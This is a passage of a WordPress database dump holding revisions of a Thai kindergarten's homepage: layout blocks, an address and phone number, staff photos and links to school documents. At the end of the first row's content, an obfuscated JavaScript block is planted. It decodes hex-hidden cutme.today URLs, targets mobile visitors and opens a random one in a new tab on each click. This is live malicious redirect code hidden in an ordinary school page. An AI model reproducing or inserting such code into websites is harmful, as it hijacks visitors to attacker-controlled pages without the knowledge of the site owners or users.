class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 17:17:35','2025-07-15 10:17:35','',19,'http://watprato.ssk.in.th/?p=731',0,'revision','',0),
(732,1,'2025-07-15 17:23:08','2025-07-15 10:23:08','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" 